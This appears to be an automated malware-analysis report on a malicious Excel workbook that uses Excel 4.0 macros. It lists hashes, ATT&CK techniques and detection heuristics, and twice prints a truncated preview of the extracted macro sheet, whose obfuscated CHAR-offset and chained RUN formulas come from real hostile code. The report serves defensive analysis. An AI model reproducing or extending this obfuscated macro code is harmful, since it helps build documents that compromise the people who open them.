Office (OOXML) malware analysis — malicious · 01558388b33abe05

MALICIOUS

Office (OOXML)

30.8 KB Created: 2020-04-14 07:15:43 UTC Authoring application: Microsoft Excel 16.0300 First seen: 2020-07-24

MD5: 0be6ece31de89f3efb4125e086416ffc SHA-1: 01d3e9a0fe2a52bfd715012a623511029efe77ab SHA-256: 01558388b33abe05f25afb6e96b0c899221fe75b037c088fa60fe8bbf668f606

190 Risk Score

Malware Insights

MITRE ATT&CK

T1059.005 Visual Basic T1566.001 Spearphishing Attachment

The sample is an Excel document containing Excel 4.0 macros, indicated by the 'OOXML_XLM_MACROSHEET' and 'OOXML_XLM_AUTOOPEN_DEFINEDNAME' heuristics. The macros utilize dangerous functions like RUN, FORMULA, and CALL to execute arbitrary code, likely to download and run a second-stage payload. The document body displays a protection warning, a common lure to encourage users to enable macros.

Heuristics 5

Excel 4.0 macro sheet (1 sheet(s)) critical 2 related findings OOXML_XLM_MACROSHEET

Spreadsheet contains an Excel 4.0 (XLM) macro sheet — XLM was a major Office malware vector during 2020-2022 and evaded many VBA-focused controls before Microsoft tightened XLM defaults. Even legitimate XLM use is rare in modern workbooks.
Excel 4.0 Auto_Open defined name critical OOXML_XLM_AUTOOPEN_DEFINEDNAME

Workbook defines _xlnm.Auto_Open or _xlnm.Auto_Close while containing an XLM macro sheet. This is the OOXML/XLSB auto-execution shape for Excel 4.0 macros.
Dangerous XLM formula APIs: RUN, FORMULA, CALL, HALT critical OOXML_XLM_DANGEROUS_FN

Excel 4.0 macro sheet uses formula APIs that call directly into Win32 (=CALL/=EXEC/=REGISTER/=FORMULA). These are the primitives used to download payloads, write files, and start processes from an XLM macro without invoking VBA.
Hidden worksheet (hidden) low OOXML_HIDDEN_SHEET

Excel workbook contains 1 hidden sheet(s) — hidden sheets are commonly used to conceal macro code, staging data, or intermediate payload construction
Embedded URL info EMBEDDED_URL

One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
URL http://schemas.openxmlformats.org/spreadsheetml/2006/main In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/excel/2006/mainIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/officeDocument/2006/relationshipsIn document text (OOXML body / shared strings)
- http://schemas.openxmlformats.org/markup-compatibility/2006In document text (OOXML body / shared strings)
- http://schemas.microsoft.com/office/spreadsheetml/2009/9/acIn document text (OOXML body / shared strings)

Extracted artifacts 1

Files carved from inside the sample during analysis.

Filename Kind Source Size

xlm_sheet_00.xml xlm-macrosheet OOXML XLM macro sheet: xl/macrosheets/sheet1.xml 76438 bytes

Filename	Kind	Source	Size
`xlm_sheet_00.xml`	xlm-macrosheet	OOXML XLM macro sheet: xl/macrosheets/sheet1.xml	76438 bytes
SHA-256: `86ebb6e57d5632d3682009c7fbe7da84cf68af87f604d4974fb1f4ab49ff3e6a`
Preview script First 1,000 lines of the extracted script <?xml version="1.0" encoding="UTF-8" standalone="yes"?> <xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:IO1999"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/><sheetData><row r="5" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ5" t="str"><f>CHAR($CW$1165-33)</f><v>e</v></c></row><row r="6" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ6" t="b"><f>RUN($DF$76)</f><v>0</v></c></row><row r="7" spans="43:211" x14ac:dyDescent="0.3"><c r="ET7"><v>18</v></c></row><row r="9" spans="43:211" x14ac:dyDescent="0.3"><c r="HC9"><v>65</v></c></row><row r="11" spans="43:211" x14ac:dyDescent="0.3"><c r="AY11"><v>151</v></c></row><row r="12" spans="43:211" x14ac:dyDescent="0.3"><c r="FZ12"><v>7</v></c></row><row r="14" spans="43:211" x14ac:dyDescent="0.3"><c r="AQ14"><v>132</v></c><c r="FN14" t="b"><f>RUN($CN$1154)</f><v>0</v></c></row><row r="25" spans="51:51" x14ac:dyDescent="0.3"><c r="AY25"><v>13</v></c></row><row r="41" spans="88:191" x14ac:dyDescent="0.3"><c r="DI41" t="b"><f>RUN($GV$600)</f><v>0</v></c></row><row r="42" spans="88:191" x14ac:dyDescent="0.3"><c r="EB42"><v>7</v></c></row><row r="43" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ43" t="str"><f>CHAR($HE$158-33)</f><v>R</v></c></row><row r="44" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ44" t="b"><f>RUN($H$1937)</f><v>0</v></c></row><row r="47" spans="88:191" x14ac:dyDescent="0.3"><c r="GI47"><v>641</v></c></row><row r="50" spans="33:181" x14ac:dyDescent="0.3"><c r="CQ50"><v>135</v></c></row><row r="57" spans="33:181" x14ac:dyDescent="0.3"><c r="AG57"><v>26</v></c></row><row r="60" spans="33:181" x14ac:dyDescent="0.3"><c r="BV60"><v>21</v></c></row><row r="63" spans="33:181" x14ac:dyDescent="0.3"><c r="FY63" t="b"><f>RUN($DC$1871)</f><v>0</v></c></row><row r="65" spans="65:234" x14ac:dyDescent="0.3"><c r="BM65"><v>453</v></c></row><row r="66" spans="65:234" x14ac:dyDescent="0.3"><c r="BM66"><v>95</v></c></row><row r="71" spans="65:234" x14ac:dyDescent="0.3"><c r="CX71"><v>79</v></c><c r="FY71"><v>72</v></c></row><row r="75" spans="65:234" x14ac:dyDescent="0.3"><c r="EV75" t="b"><f>RUN($AF$103)</f><v>0</v></c></row><row r="77" spans="65:234" x14ac:dyDescent="0.3"><c r="EW77" t="b"><f>RUN($BQ$496)</f><v>0</v></c></row><row r="79" spans="65:234" x14ac:dyDescent="0.3"><c r="HZ79"><v>34</v></c></row><row r="83" spans="21:217" x14ac:dyDescent="0.3"><c r="EP83"><v>111</v></c></row><row r="90" spans="21:217" x14ac:dyDescent="0.3"><c r="HI90" t="str"><f>CHAR($H$1715-33)</f><v>d</v></c></row><row r="91" spans="21:217" x14ac:dyDescent="0.3"><c r="AP91"><v>48</v></c><c r="HI91" t="b"><f>RUN($IK$304)</f><v>0</v></c></row><row r="92" spans="21:217" x14ac:dyDescent="0.3"><c r="U92"><v>149</v></c></row><row r="95" spans="21:217" x14ac:dyDescent="0.3"><c r="DR95" t="str"><f>CHAR($I$1901-525)</f><v>\</v></c></row><row r="96" spans="21:217" x14ac:dyDescent="0.3"><c r="DJ96" t="str"><f>CHAR($EG$1840-33)</f><v>R</v></c><c r="DR96" t="b"><f>RUN($DL$1790)</f><v>0</v></c></row><row r="97" spans="2:114" x14ac:dyDescent="0.3"><c r="DJ97" t="b"><f>RUN($EH$307)</f><v>0</v></c></row><row r="101" spans="2:114" x14ac:dyDescent="0.3"><c r="B101" t="b"><f>RUN($HW$1263)</f><v>0</v></c></row><row r="103" spans="2:114" x14ac:dyDescent="0.3"><c r="AF103" t="b"><f>RUN($AK$1469)</f><v>0</v></c></row><row r="104" spans="2:114" x14ac:dyDescent="0.3"><c r="S104"><v>143</v></c></row><row r="106" spans="2:114" x14ac:dyDescent="0.3"><c r="CI106"><v>61</v></c></row><row r="108" spans="2:114" x14ac:dyDescent="0.3"><c r="AO108"><v>41</v></c></row><row r="117" spans="27:168" x14ac:dyDescent="0.3"><c r="AA117" t="str"><f>CHAR($CM$889-33)</f><v>E</v></c></row><row r="118" spans="27:1 ... (truncated)

SHA-256: 86ebb6e57d5632d3682009c7fbe7da84cf68af87f604d4974fb1f4ab49ff3e6a

Preview script

First 1,000 lines of the extracted script

<?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<xm:macrosheet xmlns="http://schemas.openxmlformats.org/spreadsheetml/2006/main" xmlns:xm="http://schemas.microsoft.com/office/excel/2006/main" xmlns:r="http://schemas.openxmlformats.org/officeDocument/2006/relationships" xmlns:mc="http://schemas.openxmlformats.org/markup-compatibility/2006" mc:Ignorable="x14ac" xmlns:x14ac="http://schemas.microsoft.com/office/spreadsheetml/2009/9/ac"><dimension ref="A5:IO1999"/><sheetViews><sheetView showFormulas="1" workbookViewId="0"/></sheetViews><sheetFormatPr defaultRowHeight="14" x14ac:dyDescent="0.3"/><sheetData><row r="5" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ5" t="str"><f>CHAR($CW$1165-33)</f><v>e</v></c></row><row r="6" spans="43:211" x14ac:dyDescent="0.3"><c r="FJ6" t="b"><f>RUN($DF$76)</f><v>0</v></c></row><row r="7" spans="43:211" x14ac:dyDescent="0.3"><c r="ET7"><v>18</v></c></row><row r="9" spans="43:211" x14ac:dyDescent="0.3"><c r="HC9"><v>65</v></c></row><row r="11" spans="43:211" x14ac:dyDescent="0.3"><c r="AY11"><v>151</v></c></row><row r="12" spans="43:211" x14ac:dyDescent="0.3"><c r="FZ12"><v>7</v></c></row><row r="14" spans="43:211" x14ac:dyDescent="0.3"><c r="AQ14"><v>132</v></c><c r="FN14" t="b"><f>RUN($CN$1154)</f><v>0</v></c></row><row r="25" spans="51:51" x14ac:dyDescent="0.3"><c r="AY25"><v>13</v></c></row><row r="41" spans="88:191" x14ac:dyDescent="0.3"><c r="DI41" t="b"><f>RUN($GV$600)</f><v>0</v></c></row><row r="42" spans="88:191" x14ac:dyDescent="0.3"><c r="EB42"><v>7</v></c></row><row r="43" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ43" t="str"><f>CHAR($HE$158-33)</f><v>R</v></c></row><row r="44" spans="88:191" x14ac:dyDescent="0.3"><c r="CJ44" t="b"><f>RUN($H$1937)</f><v>0</v></c></row><row r="47" spans="88:191" x14ac:dyDescent="0.3"><c r="GI47"><v>641</v></c></row><row r="50" spans="33:181" x14ac:dyDescent="0.3"><c r="CQ50"><v>135</v></c></row><row r="57" spans="33:181" x14ac:dyDescent="0.3"><c r="AG57"><v>26</v></c></row><row r="60" spans="33:181" x14ac:dyDescent="0.3"><c r="BV60"><v>21</v></c></row><row r="63" spans="33:181" x14ac:dyDescent="0.3"><c r="FY63" t="b"><f>RUN($DC$1871)</f><v>0</v></c></row><row r="65" spans="65:234" x14ac:dyDescent="0.3"><c r="BM65"><v>453</v></c></row><row r="66" spans="65:234" x14ac:dyDescent="0.3"><c r="BM66"><v>95</v></c></row><row r="71" spans="65:234" x14ac:dyDescent="0.3"><c r="CX71"><v>79</v></c><c r="FY71"><v>72</v></c></row><row r="75" spans="65:234" x14ac:dyDescent="0.3"><c r="EV75" t="b"><f>RUN($AF$103)</f><v>0</v></c></row><row r="77" spans="65:234" x14ac:dyDescent="0.3"><c r="EW77" t="b"><f>RUN($BQ$496)</f><v>0</v></c></row><row r="79" spans="65:234" x14ac:dyDescent="0.3"><c r="HZ79"><v>34</v></c></row><row r="83" spans="21:217" x14ac:dyDescent="0.3"><c r="EP83"><v>111</v></c></row><row r="90" spans="21:217" x14ac:dyDescent="0.3"><c r="HI90" t="str"><f>CHAR($H$1715-33)</f><v>d</v></c></row><row r="91" spans="21:217" x14ac:dyDescent="0.3"><c r="AP91"><v>48</v></c><c r="HI91" t="b"><f>RUN($IK$304)</f><v>0</v></c></row><row r="92" spans="21:217" x14ac:dyDescent="0.3"><c r="U92"><v>149</v></c></row><row r="95" spans="21:217" x14ac:dyDescent="0.3"><c r="DR95" t="str"><f>CHAR($I$1901-525)</f><v>\</v></c></row><row r="96" spans="21:217" x14ac:dyDescent="0.3"><c r="DJ96" t="str"><f>CHAR($EG$1840-33)</f><v>R</v></c><c r="DR96" t="b"><f>RUN($DL$1790)</f><v>0</v></c></row><row r="97" spans="2:114" x14ac:dyDescent="0.3"><c r="DJ97" t="b"><f>RUN($EH$307)</f><v>0</v></c></row><row r="101" spans="2:114" x14ac:dyDescent="0.3"><c r="B101" t="b"><f>RUN($HW$1263)</f><v>0</v></c></row><row r="103" spans="2:114" x14ac:dyDescent="0.3"><c r="AF103" t="b"><f>RUN($AK$1469)</f><v>0</v></c></row><row r="104" spans="2:114" x14ac:dyDescent="0.3"><c r="S104"><v>143</v></c></row><row r="106" spans="2:114" x14ac:dyDescent="0.3"><c r="CI106"><v>61</v></c></row><row r="108" spans="2:114" x14ac:dyDescent="0.3"><c r="AO108"><v>41</v></c></row><row r="117" spans="27:168" x14ac:dyDescent="0.3"><c r="AA117" t="str"><f>CHAR($CM$889-33)</f><v>E</v></c></row><row r="118" spans="27:1
... (truncated)

Open this report in the interactive analyzer, or submit your own file for analysis.